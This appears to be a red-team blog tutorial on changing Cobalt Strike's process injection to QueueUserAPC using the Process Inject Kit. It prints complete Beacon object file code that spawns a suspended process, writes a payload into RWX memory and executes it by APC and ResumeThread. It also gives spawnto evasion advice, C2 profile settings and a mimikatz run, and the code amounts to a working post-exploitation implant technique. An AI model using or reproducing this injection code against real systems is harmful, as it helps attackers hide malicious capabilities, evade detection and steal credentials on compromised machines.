Customizing Process Injection in Cobalt Strike

Introduction
Cobalt Strike Post-Exploitation in a Nutshell
Goals
Customizing Process Spawning
Getting the spawnto Value
Allocating and Copying Memory
QueueUserAPC
Examining Process Memory
Code Snippets
References

Introduction

In this blog post, I walk through a simple example of modifying Cobalt Strike’s default process injection behavior to use QueueUserAPC through the Process Inject Kit.

Cobalt Strike Post-Exploitation in a Nutshell

When you load BOFs or run tools like Mimikatz through a beacon, Cobalt Strike will either perform inline execution or a fork and run of the capability.

Inline execution: Usually for BOFs, pushed to the beacon and executed within the beacon’s process. Local process memory allocation and injection occurs here.
Fork and run: Spawns a temporary process and injects a DLL into that process. The DLL contains the corresponding capability and is reflectively loaded into the temporary process.

Fork and run commands have two variants:

Process injection spawn: spawns a temporary process, defined by the “spawnto” setting (e.g. when using the spawn command)
Process injection explicit: injects into an existing process (e.g. when using shinject, which requires a remote process ID)

These two variants are handled by the internal Beacon APIs BeaconInjectTemporaryProcess and BeaconInjectProcess respectively, which provide a layer of abstraction over the actual process injection methods being used.

Before Cobalt Strike 4.5, the only way to modify the process injection techniques was through the teamserver’s C2 profile, which didn’t offer much room for customization. Cobalt Strike now ships with a Process Inject Kit that lets operators customize the process injection methods used by these fork and run commands.

Goals

My goal was to implement QueueUserAPC injection in Cobalt Strike beacons using the Process Inject Kit.

QueueUserAPC allows an application to queue an Asynchronous Procedure Call (APC) to a thread. The APC runs the next time that thread enters an alertable state. QueueUserAPC also works against a suspended thread, as long as the thread is resumed later; an APC queued before a thread has begun running is called when the thread starts.

In malware, the APC routine is usually a pointer to some shellcode, so the shellcode executes once the thread becomes alertable.

Since QueueUserAPC requires an alertable or suspended thread, one of the main ways to perform QueueUserAPC is to create a suspended process so that all of its threads are suspended. We can then queue an APC to the suspended process’s main thread, then resume that thread to execute the shellcode.
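
To make the queue-then-resume idea concrete, here is a toy model in portable C. It is only a simulation under my own assumptions: sim_thread, sim_queue_apc, sim_resume and sim_alertable_point are hypothetical names, not Windows APIs, and the model ignores everything the real kernel does. It just shows that queued routines sit idle while the thread is suspended, then run in first-in, first-out order once the thread is resumed and reaches an alertable point.

```c
#include <assert.h>
#include <stddef.h>

/* Toy model only: none of these names are Windows APIs. */
#define SIM_MAX_PENDING 8

typedef void (*sim_apc_routine)(unsigned long param);

typedef struct {
    sim_apc_routine routine[SIM_MAX_PENDING]; /* queued callbacks */
    unsigned long param[SIM_MAX_PENDING];     /* argument for each callback */
    size_t count;                             /* callbacks waiting in the queue */
    int suspended;                            /* 1 while the thread is suspended */
} sim_thread;

/* Queue a routine. Returns 1 on success and 0 if the queue is full,
   loosely mirroring the nonzero-on-success convention of QueueUserAPC. */
int sim_queue_apc(sim_thread *t, sim_apc_routine fn, unsigned long param) {
    assert(t != NULL && fn != NULL);
    if (t->count == SIM_MAX_PENDING) {
        return 0;
    }
    t->routine[t->count] = fn;
    t->param[t->count] = param;
    t->count++;
    return 1;
}

/* Mark the simulated thread as running again. */
void sim_resume(sim_thread *t) {
    assert(t != NULL);
    t->suspended = 0;
}

/* The thread reaches an alertable point: run every queued routine in
   FIFO order. A suspended thread runs nothing. Returns how many ran. */
size_t sim_alertable_point(sim_thread *t) {
    assert(t != NULL);
    if (t->suspended) {
        return 0;
    }
    size_t ran = t->count;
    for (size_t i = 0; i < t->count; i++) {
        t->routine[i](t->param[i]);
    }
    t->count = 0;
    return ran;
}

/* Example routine that records the order in which it was called. */
unsigned long sim_log[SIM_MAX_PENDING];
size_t sim_log_len = 0;

void sim_record(unsigned long param) {
    if (sim_log_len < SIM_MAX_PENDING) {
        sim_log[sim_log_len++] = param;
    }
}
```

In the real technique the "routine" is an address in another process and the "alertable point" is reached during thread startup, but the ordering is the same: queue first, resume second.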

The Process Inject Kit comes with two .c files, process_inject_spawn.c and process_inject_explicit.c, which contain code to perform their associated fork and run technique.

I decided to go with process_inject_spawn.c for this case, which spawns a temporary process to execute our capabilities. We can alter this code to get our process to spawn in a suspended state and perform QueueUserAPC against it.

Customizing Process Spawning

The code currently uses BeaconSpawnTemporaryProcess, which accounts for things like PPIDs, process architecture, and other Beacon-related data, but doesn’t provide options to create the process in a suspended state.

if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
  BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
  return;
}

For our case, we need to call a WinAPI such as CreateProcessA directly.

Every WinAPI we call, CreateProcessA included, has to be imported by adding a declaration like this to the top of the file:

DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
  LPCSTR lpApplicationName,
  LPSTR lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL bInheritHandles,
  DWORD dwCreationFlags,
  LPVOID lpEnvironment,
  LPCSTR lpCurrentDirectory,
  LPSTARTUPINFOA lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation);
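
The KERNEL32$CreateProcessA name follows the LIBRARY$Function convention that Beacon object files use for imports: the part before the $ names the module and the part after it names the exported function. As a rough illustration of how such a symbol breaks down, here is a small sketch in portable C. split_dfr_symbol is a hypothetical helper I made up for this example; it is not part of beacon.h and says nothing about how Beacon resolves imports internally.

```c
#include <assert.h>
#include <string.h>

/* Illustration only: split_dfr_symbol is a hypothetical helper.
   Splits "MODULE$Function" into its two halves.
   Returns 1 on success, 0 if the symbol is malformed or a buffer is too small. */
int split_dfr_symbol(const char *symbol,
                     char *module, size_t module_cap,
                     char *function, size_t function_cap) {
    assert(symbol != NULL && module != NULL && function != NULL);

    const char *sep = strchr(symbol, '$');
    if (sep == NULL) {
        return 0; /* no separator, so not a LIBRARY$Function symbol */
    }

    size_t mod_len = (size_t)(sep - symbol);
    size_t fn_len = strlen(sep + 1);
    if (mod_len == 0 || fn_len == 0) {
        return 0; /* one half is empty */
    }
    if (mod_len + 1 > module_cap || fn_len + 1 > function_cap) {
        return 0; /* would not fit, including the terminating NUL */
    }

    memcpy(module, symbol, mod_len);
    module[mod_len] = '\0';
    memcpy(function, sep + 1, fn_len + 1); /* copies the NUL as well */
    return 1;
}
```

For "KERNEL32$CreateProcessA" this yields the module name "KERNEL32" and the function name "CreateProcessA", which is why each import has to be spelled with the right library prefix.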

And then in our code, we can call CreateProcessA by using the following:

// CreateProcess in suspended state
char cmd[] = "notepad.exe";
BOOL success = KERNEL32$CreateProcessA(
  NULL,
  cmd,
  NULL,
  NULL,
  FALSE,
  CREATE_NO_WINDOW | CREATE_SUSPENDED,
  NULL,
  NULL,
  &si,
  &pi);
if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
  return;
}

Getting the spawnto Value

By default, when running a fork and run command using the “spawn” method, Cobalt Strike will spawn rundll32.exe and go on from there. This is the default spawnto value of the Cobalt Strike teamserver.

However, this is heavily signatured, so it’s common to see operators change this value to something else. We can do this within the beacon by running the command:

spawnto x64 %windir%\sysnative\notepad.exe

Or for the entire teamserver in the C2 profile:

post-ex {
  set spawnto_x86 "%windir%\\syswow64\\notepad.exe";
  set spawnto_x64 "%windir%\\sysnative\\notepad.exe";
}

We want to make sure that our custom process injection method is consistent with this setting, so we use the BeaconGetSpawnTo function which is defined in beacon.h.

void BeaconGetSpawnTo(
  BOOL x86,
  char * buffer,
  int length
)

BeaconGetSpawnTo has three parameters:

x86 selects which spawnto value to fetch: the x86 setting when TRUE, the x64 setting when FALSE
buffer is the char buffer that will receive the spawnto value
length is presumably the size of the char buffer; I wasn’t certain

I looked at some GitHub repos that call this function and found one that defines a constant MAX_PATH_LENGTH as 1000 and simply passes it to BeaconGetSpawnTo, so I did the same in my code.

// define MAX_PATH_LENGTH at top of file
#define MAX_PATH_LENGTH 1000

// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
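
A buffer plus length pair like this usually means the callee writes at most length bytes into buffer. Here is a minimal sketch of that convention in portable C, assuming that is what BeaconGetSpawnTo does. sim_get_spawn_to and the two paths are hypothetical stand-ins, not Beacon's implementation, and unlike the real function (which returns void) the stand-in returns a status so that truncation is visible.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical values for illustration only. */
#define SIM_SPAWNTO_X86 "C:\\Windows\\SysWOW64\\notepad.exe"
#define SIM_SPAWNTO_X64 "C:\\Windows\\System32\\notepad.exe"

/* Hypothetical stand-in, not Beacon's implementation.
   Copies the selected value into buffer, writing at most length bytes
   including the terminating NUL. Returns 1 if the whole value fit and
   0 if it had to be truncated. */
int sim_get_spawn_to(int x86, char *buffer, int length) {
    assert(buffer != NULL && length > 0);

    const char *value = x86 ? SIM_SPAWNTO_X86 : SIM_SPAWNTO_X64;
    size_t needed = strlen(value) + 1;   /* bytes including the NUL */
    size_t cap = (size_t)length;
    size_t n = needed < cap ? needed : cap;

    memcpy(buffer, value, n - 1);        /* copy what fits */
    buffer[n - 1] = '\0';                /* always terminate */
    return needed <= cap;
}
```

Under this reading, passing the same constant as both the array size and the length argument, as the snippet above does, keeps the callee from writing past the end of spawnTo.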

We can now use this spawnto value in our CreateProcessA function:

// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);

// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
  NULL,
  spawnTo,
  NULL,
  NULL,
  FALSE,
  CREATE_NO_WINDOW | CREATE_SUSPENDED,
  NULL,
  NULL,
  &si,
  &pi);
if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
  return;
}

Allocating and Copying Memory

Before we call QueueUserAPC, we need to allocate memory in the remote process and copy our shellcode into that allocation. For this I went with the good ol’ VirtualAllocEx and WriteProcessMemory.

// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
  pi.hProcess,
  NULL,
  dllLen,
  MEM_COMMIT,
  PAGE_EXECUTE_READWRITE);

if (remoteBuffer == NULL) {
  BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
  return;
}

BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);

// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
  pi.hProcess,
  remoteBuffer,
  dllPtr,
  dllLen,
  &bytesWritten);

if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
  return;
}

QueueUserAPC

After creating a suspended process and allocating and copying memory into it, we can finally perform QueueUserAPC against the suspended main thread of the process.

It’s actually pretty easy to do. We just need to call QueueUserAPC with the pointer to the remote shellcode and a handle to the remote, suspended thread. We then call ResumeThread to allow the thread to execute our shellcode.

// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
  (PAPCFUNC)remoteBuffer,
  pi.hThread,
  0);

if (queueUserApcResult == 0) {
  BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
  return;
}

KERNEL32$ResumeThread(pi.hThread);

Examining Process Memory

We can build the kit with build.sh, which compiles the object files and gives us a .cna script that we can load into our Cobalt Strike client.

$ ./build.sh /opt/cobaltstrike/custom-inject-output
[Process Inject kit] [+] You have a x86_64 mingw--I will recompile the process inject beacon object files
[Process Inject kit] [*] Compile process_inject_spawn.x64.o
[Process Inject kit] [*] Compile process_inject_spawn.x86.o
[Process Inject kit] [*] Compile process_inject_explicit.x64.o
[Process Inject kit] [*] Compile process_inject_explicit.x86.o
[Process Inject kit] [+] The Process inject object files are saved in '/opt/cobaltstrike/custom-inject-output'

Since I was calling VirtualAllocEx with RWX memory permissions, I wanted to see what it would look like in Process Hacker to confirm that the WinAPIs were being used properly.

I ran mimikatz standard::sleep 80000 on the beacon, since mimikatz is one of the commands that uses the fork and run method.

When I examined the process memory, it looked like the region had already been freed.

This was because I had cleanup set to true in my Malleable C2 profile, so I switched it to false and ran the mimikatz command again.

And there it is! The RWX region confirms that my VirtualAllocEx call is being used and my code isn’t broken.

Code Snippets

Imports and constants:

#define MAX_PATH_LENGTH 1000

DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
  LPCSTR lpApplicationName,
  LPSTR lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL bInheritHandles,
  DWORD dwCreationFlags,
  LPVOID lpEnvironment,
  LPCSTR lpCurrentDirectory,
  LPSTARTUPINFOA lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation);

DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$QueueUserAPC (
  PAPCFUNC pfnAPC,
  HANDLE hThread,
  ULONG_PTR dwData);

DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread (
  HANDLE hThread);

DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx (
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD flAllocationType,
  DWORD flProtect);

DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory (
  HANDLE hProcess,
  LPVOID lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T nSize,
  SIZE_T *lpNumberOfBytesWritten);

QueueUserAPC implementation:

/* begin QueueUserAPC implementation */

// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);

// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
  NULL,
  spawnTo,
  NULL,
  NULL,
  FALSE,
  CREATE_NO_WINDOW | CREATE_SUSPENDED,
  NULL,
  NULL,
  &si,
  &pi);

if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
  return;
}

BeaconPrintf(CALLBACK_OUTPUT, "[+] Process ID of spawned process: %d", pi.dwProcessId);

// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
  pi.hProcess,
  NULL,
  dllLen,
  MEM_COMMIT,
  PAGE_EXECUTE_READWRITE);

if (remoteBuffer == NULL) {
  BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
  return;
}

BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);

// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
  pi.hProcess,
  remoteBuffer,
  dllPtr,
  dllLen,
  &bytesWritten);

if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
  return;
}

// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
  (PAPCFUNC)remoteBuffer,
  pi.hThread,
  0);

if (queueUserApcResult == 0) {
  BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
  return;
}

KERNEL32$ResumeThread(pi.hThread);